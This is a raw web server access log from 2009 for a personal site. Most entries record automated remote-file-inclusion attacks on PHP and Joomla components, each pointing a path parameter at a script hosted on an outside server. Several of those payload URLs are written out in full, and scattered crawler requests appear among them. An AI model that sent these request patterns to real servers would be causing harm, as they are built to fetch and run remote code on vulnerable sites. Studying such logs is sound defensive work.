201.218.228.226 - - [30/Oct/2009:11:32:50 -0700] "GET /logs/access_080126.log%20%20/admin/editeur/spaw_control.class.php?spaw_root=http://www.okeg.co.kr//bbs/data/css/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
201.218.228.226 - - [30/Oct/2009:11:32:50 -0700] "GET /logs/access_080509.log%20%20/admin/editeur/spaw_control.class.php?spaw_root=http://www.okeg.co.kr//bbs/data/css/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
70.99.241.34 - - [30/Oct/2009:11:33:04 -0700] "GET /logs/access_090311.log HTTP/1.1" 200 1441792 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:11:33:12 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.melawai.com//images/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:11:33:12 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.melawai.com//images/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:11:33:12 -0700] "GET /logs/access_080228.log%20%20//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.melawai.com//images/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.7.173.20 - - [30/Oct/2009:11:33:19 -0700] "GET /logs/access_081104.log/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.pacificdxpedition.com/images/logs/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.7.173.20 - - [30/Oct/2009:11:33:19 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.pacificdxpedition.com/images/logs/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.7.173.20 - - [30/Oct/2009:11:33:19 -0700] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.pacificdxpedition.com/images/logs/yes.txt??? HTTP/1.1" 200 50 "-" "libwww-perl/5.79" "www.dmulk.com"
222.236.47.182 - - [30/Oct/2009:11:33:20 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.182 - - [30/Oct/2009:11:33:20 -0700] "GET /skin/zero_vote/error.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.182 - - [30/Oct/2009:11:33:20 -0700] "GET /logs/access_071228.log%20%20//skin/zero_vote/error.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.182 - - [30/Oct/2009:11:33:20 -0700] "GET /logs/access_090104.log%20%20//skin/zero_vote/error.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.11.145.8 - - [30/Oct/2009:11:33:45 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://ea3.fileave.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.11.145.8 - - [30/Oct/2009:11:33:45 -0700] "GET /logs/access_090704.log//skin/zero_vote/error.php?dir=http://ea3.fileave.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
70.99.241.34 - - [30/Oct/2009:11:34:03 -0700] "GET /logs/access_090311.log HTTP/1.1" 200 1310720 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:11:34:10 -0700] "GET /logs/access_071223.log%20%20//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.melawai.com//images/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.249.68.165 - - [30/Oct/2009:11:34:22 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/thumbs/thumbs_082.jpg HTTP/1.1" 200 0 "-" "Googlebot-Image/1.0" "dmulk.com"
85.214.25.101 - - [30/Oct/2009:11:34:34 -0700] "GET /logs/access_090204.log%20//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://imagehut.ws/images2/raid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
70.99.241.34 - - [30/Oct/2009:11:34:55 -0700] "GET /logs/access_090311.log HTTP/1.1" 200 1179648 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0" "www.dmulk.com"
114.4.8.14 - - [30/Oct/2009:11:35:38 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
114.4.8.14 - - [30/Oct/2009:11:35:38 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
114.4.8.14 - - [30/Oct/2009:11:35:38 -0700] "GET /logs/access_090519.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
114.4.8.14 - - [30/Oct/2009:11:35:41 -0700] "GET /logs/access_090625.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
114.4.8.14 - - [30/Oct/2009:11:35:41 -0700] "GET /logs/access_090625.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
114.4.8.14 - - [30/Oct/2009:11:35:41 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
114.4.8.14 - - [30/Oct/2009:11:35:41 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
114.4.8.14 - - [30/Oct/2009:11:35:41 -0700] "GET /logs/access_090519.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
114.4.8.14 - - [30/Oct/2009:11:36:04 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
114.4.8.14 - - [30/Oct/2009:11:36:04 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
114.4.8.14 - - [30/Oct/2009:11:36:04 -0700] "GET /logs/access_090625.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
114.4.8.14 - - [30/Oct/2009:11:36:04 -0700] "GET /logs/access_090519.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
70.99.241.34 - - [30/Oct/2009:11:36:10 -0700] "GET /logs/access_090311.log HTTP/1.1" 200 1572864 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0" "www.dmulk.com"
114.4.8.14 - - [30/Oct/2009:11:36:13 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
114.4.8.14 - - [30/Oct/2009:11:36:13 -0700] "GET /logs/access_090625.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
114.4.8.14 - - [30/Oct/2009:11:36:13 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
114.4.8.14 - - [30/Oct/2009:11:36:13 -0700] "GET /logs/access_090519.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.11.145.8 - - [30/Oct/2009:11:36:17 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://ea3.fileave.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.11.145.8 - - [30/Oct/2009:11:36:17 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://ea3.fileave.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.11.145.8 - - [30/Oct/2009:11:36:18 -0700] "GET /logs/access_080215.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://ea3.fileave.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.11.145.8 - - [30/Oct/2009:11:36:18 -0700] "GET /logs/access_080704.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://ea3.fileave.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.195.115.254 - - [30/Oct/2009:11:36:28 -0700] "GET /bikes/cb750K6/?M=A HTTP/1.0" 200 1610 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
201.82.194.38 - - [30/Oct/2009:11:36:58 -0700] "GET /logs/access_080802.log HTTP/1.1" 200 2033105 "-" "n gfkovdthhesibtsjwhaftvvcO nwpjw7" "www.dmulk.com"
67.195.115.254 - - [30/Oct/2009:11:36:59 -0700] "GET /logs/access_080120.log HTTP/1.0" 200 585838 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.115.254 - - [30/Oct/2009:11:38:51 -0700] "GET /logs/access_090323.log HTTP/1.0" 200 3501505 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
85.111.12.199 - - [30/Oct/2009:11:39:04 -0700] "GET /logs/access_080807.log////?_SERVER[DOCUMENT_ROOT]=http://www.hotlinkfiles.com/files/2422783_g1tq6/i.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.111.12.199 - - [30/Oct/2009:11:39:05 -0700] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.hotlinkfiles.com/files/2422783_g1tq6/i.txt???? HTTP/1.1" 200 123790 "-" "Mozilla/5.0" "www.dmulk.com"
85.111.12.199 - - [30/Oct/2009:11:39:07 -0700] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.hotlinkfiles.com/files/2422783_g1tq6/i.txt???? HTTP/1.1" 200 16083 "-" "Mozilla/5.0" "www.dmulk.com"
114.4.8.14 - - [30/Oct/2009:11:39:13 -0700] "GET /logs/access_090625.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
114.4.8.14 - - [30/Oct/2009:11:39:13 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
114.4.8.14 - - [30/Oct/2009:11:39:13 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
114.4.8.14 - - [30/Oct/2009:11:39:13 -0700] "GET /logs/access_090519.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.111.12.199 - - [30/Oct/2009:11:39:16 -0700] "GET /logs/access_080310.log////?_SERVER[DOCUMENT_ROOT]=http://www.hotlinkfiles.com/files/2422783_g1tq6/i.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
114.4.8.14 - - [30/Oct/2009:11:39:32 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
114.4.8.14 - - [30/Oct/2009:11:39:32 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
114.4.8.14 - - [30/Oct/2009:11:39:33 -0700] "GET /logs/access_090625.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
114.4.8.14 - - [30/Oct/2009:11:39:34 -0700] "GET /logs/access_090519.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
112.78.14.2 - - [30/Oct/2009:11:39:44 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://119.69.199.43/bbs//idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
112.78.14.2 - - [30/Oct/2009:11:39:44 -0700] "GET /include/admin.lib.inc.php?site_path=http://119.69.199.43/bbs//idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
112.78.14.2 - - [30/Oct/2009:11:40:01 -0700] "GET /logs/access_080619.log//include/admin.lib.inc.php?site_path=http://119.69.199.43/bbs//idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.97.212.185 - - [30/Oct/2009:11:40:09 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.97.212.185 - - [30/Oct/2009:11:40:09 -0700] "GET /logs/access_071016.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.97.212.185 - - [30/Oct/2009:11:40:10 -0700] "GET /logs/access_071028.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.97.212.185 - - [30/Oct/2009:11:40:10 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
112.78.14.2 - - [30/Oct/2009:11:40:16 -0700] "GET /logs/access_080518.log//include/admin.lib.inc.php?site_path=http://119.69.199.43/bbs//idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
112.78.14.2 - - [30/Oct/2009:11:40:32 -0700] "GET /include/admin.lib.inc.php?site_path=http://119.69.199.43/bbs//idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
112.78.14.2 - - [30/Oct/2009:11:40:32 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://119.69.199.43/bbs//idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.111.12.199 - - [30/Oct/2009:11:40:32 -0700] "GET /logs/access_080807.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.hotlinkfiles.com/files/2422783_g1tq6/i.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
112.78.14.2 - - [30/Oct/2009:11:40:35 -0700] "GET /logs/access_080619.log%20%20//include/admin.lib.inc.php?site_path=http://119.69.199.43/bbs//idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.111.12.199 - - [30/Oct/2009:11:40:36 -0700] "GET /logs/access_080310.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.hotlinkfiles.com/files/2422783_g1tq6/i.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
112.78.14.2 - - [30/Oct/2009:11:40:37 -0700] "GET /logs/access_080518.log%20%20//include/admin.lib.inc.php?site_path=http://119.69.199.43/bbs//idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.97.212.185 - - [30/Oct/2009:11:40:54 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.97.212.185 - - [30/Oct/2009:11:40:54 -0700] "GET /logs/access_071016.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.97.212.185 - - [30/Oct/2009:11:40:54 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.97.212.185 - - [30/Oct/2009:11:40:54 -0700] "GET /logs/access_071028.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
201.218.228.226 - - [30/Oct/2009:11:41:02 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.okeg.co.kr//bbs/data/css/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
201.218.228.226 - - [30/Oct/2009:11:41:02 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.okeg.co.kr//bbs/data/css/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
201.218.228.226 - - [30/Oct/2009:11:41:02 -0700] "GET /logs/access_071028.log%20%20/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.okeg.co.kr//bbs/data/css/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
201.218.228.226 - - [30/Oct/2009:11:41:02 -0700] "GET /logs/access_071016.log%20%20/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.okeg.co.kr//bbs/data/css/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:11:41:10 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.melawai.com//images/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:11:41:10 -0700] "GET /skin/zero_vote/ask_password.php?dir=http://www.melawai.com//images/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:11:41:10 -0700] "GET /logs/access_080401.log%20%20//skin/zero_vote/ask_password.php?dir=http://www.melawai.com//images/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
112.78.14.2 - - [30/Oct/2009:11:41:33 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://119.69.199.43/bbs//idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
112.78.14.2 - - [30/Oct/2009:11:41:33 -0700] "GET /include/admin.lib.inc.php?site_path=http://119.69.199.43/bbs//idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
112.78.14.2 - - [30/Oct/2009:11:41:33 -0700] "GET /logs/access_080619.log//include/admin.lib.inc.php?site_path=http://119.69.199.43/bbs//idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.182 - - [30/Oct/2009:11:41:37 -0700] "GET /logs/access_090704.log//skin/zero_vote/error.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
212.85.35.200 - - [30/Oct/2009:11:41:46 -0700] "GET /logs/access_090527.log///?_SERVER[DOCUMENT_ROOT]=http://n34.biz/.injek/chid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
212.85.35.200 - - [30/Oct/2009:11:41:51 -0700] "GET /logs/access_081230.log///?_SERVER[DOCUMENT_ROOT]=http://n34.biz/.injek/chid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
112.78.14.2 - - [30/Oct/2009:11:42:02 -0700] "GET /logs/access_080518.log//include/admin.lib.inc.php?site_path=http://119.69.199.43/bbs//idfx1.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:11:42:27 -0700] "GET /logs/access_080330.log%20%20//skin/zero_vote/ask_password.php?dir=http://www.melawai.com//images/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.97.212.185 - - [30/Oct/2009:11:43:27 -0700] "GET /logs/access_071016.log%20%20/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.97.212.185 - - [30/Oct/2009:11:43:27 -0700] "GET /logs/access_071028.log%20%20/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.246.79.115 - - [30/Oct/2009:11:43:34 -0700] "GET /logs/access_080901.log%20%20//mcf.php?content=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.246.79.115 - - [30/Oct/2009:11:43:37 -0700] "GET /logs/access_081209.log%20%20//mcf.php?content=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.97.212.185 - - [30/Oct/2009:11:43:55 -0700] "GET /logs/access_071028.log%20%20/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.97.212.185 - - [30/Oct/2009:11:43:55 -0700] "GET /logs/access_071016.log%20%20/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
201.218.228.226 - - [30/Oct/2009:11:45:16 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
152.114.1.50 - - [30/Oct/2009:11:45:21 -0700] "GET //skin/ggambo5100_board//setup.php?dir=http://www.yeshouse.net/column/x.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
152.114.1.50 - - [30/Oct/2009:11:45:21 -0700] "GET /logs/access_090826.log%20%20///skin/ggambo5100_board//setup.php?dir=http://www.yeshouse.net/column/x.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
152.114.1.50 - - [30/Oct/2009:11:45:21 -0700] "GET /logs///skin/ggambo5100_board//setup.php?dir=http://www.yeshouse.net/column/x.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
201.218.228.226 - - [30/Oct/2009:11:45:23 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
201.218.228.226 - - [30/Oct/2009:11:45:23 -0700] "GET /logs/access_071028.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
201.218.228.226 - - [30/Oct/2009:11:45:23 -0700] "GET /logs/access_071016.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
152.114.1.50 - - [30/Oct/2009:11:45:39 -0700] "GET /logs///skin/ggambo5100_board//setup.php?dir=http://www.yeshouse.net/column/x.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "dmulk.com"
152.114.1.50 - - [30/Oct/2009:11:45:39 -0700] "GET //skin/ggambo5100_board//setup.php?dir=http://www.yeshouse.net/column/x.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "dmulk.com"
152.114.1.50 - - [30/Oct/2009:11:45:39 -0700] "GET /logs/access.log%20%20///skin/ggambo5100_board//setup.php?dir=http://www.yeshouse.net/column/x.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "dmulk.com"
72.11.145.8 - - [30/Oct/2009:11:45:40 -0700] "GET /logs/access_080704.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://ea3.fileave.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.11.145.8 - - [30/Oct/2009:11:45:40 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://ea3.fileave.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.11.145.8 - - [30/Oct/2009:11:45:40 -0700] "GET /logs/access_080215.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://ea3.fileave.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.11.145.8 - - [30/Oct/2009:11:45:40 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://ea3.fileave.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
79.64.224.47 - - [30/Oct/2009:11:45:40 -0700] "GET /logs/access_080901.log%20%20//mcf.php?content=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
79.64.224.47 - - [30/Oct/2009:11:45:41 -0700] "GET /logs/access_080414.log%20%20//mcf.php?content=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
